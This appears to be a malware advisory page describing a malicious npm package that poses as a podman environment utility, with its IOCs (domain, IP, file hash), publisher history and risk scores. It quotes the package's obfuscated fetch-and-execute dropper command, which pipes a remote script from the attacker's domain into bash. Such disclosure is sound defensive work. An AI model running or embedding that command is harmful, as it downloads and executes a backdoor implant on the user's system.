VDB

GCVE-110-OSM-2026-6491

GCVE-110-OSM-2026-6491
Advisory PublishedCVSS 8.8/10
Vulnetix · Advisory published June 22, 2026
The package contains a string-concatenation obfuscation in `index.js` that assembles and executes `bash <(curl -Ls https://gbjs.serv00.net/nezha.sh)` — a classic fetch-and-execute dropper pattern. The obfuscated command is run inside `monitorProcesses()`, which fires every 5 minutes via a scheduler, ensuring persistence and re-execution if the payload process disappears. The domain `gbjs.serv00.net` is confirmed as an IOC, and the IOC IP `128.204.223.94` is likely the same infrastructure. The publisher `liming2038` has a prior malicious package (`kisama-js`, OSM threat 067f90e5) with the same account only 313 days old, confirming a serial threat actor. The attacker model is a persistent backdoor dropper that masquerades as a podman environment utility, fetching and running the Nezha monitoring agent or a trojanized variant as a C2 implant. ENTRY index.js (bin: index.js) ADDITIONAL FINDINGS - Shell Command Execution in index.js: "require('child_process')" - Publisher Has Other Malicious Packages - Rapid Version Publishing PAYLOAD FILES index.js INDICATORS (IOCs) - ipv4: 128.204.223.94 - domains: gbjs.serv00.net - payloadFileHash: cd05b5e7f5c6b0ceb4c9f4a7ffbac202309b2706474815c497146e491f7ebbac

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
8.8/10
High · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknown@baipiaodajun/podman_envall (affected)

Browse GCVE Records

73,118 records in the GCVE database · Updated July 16, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›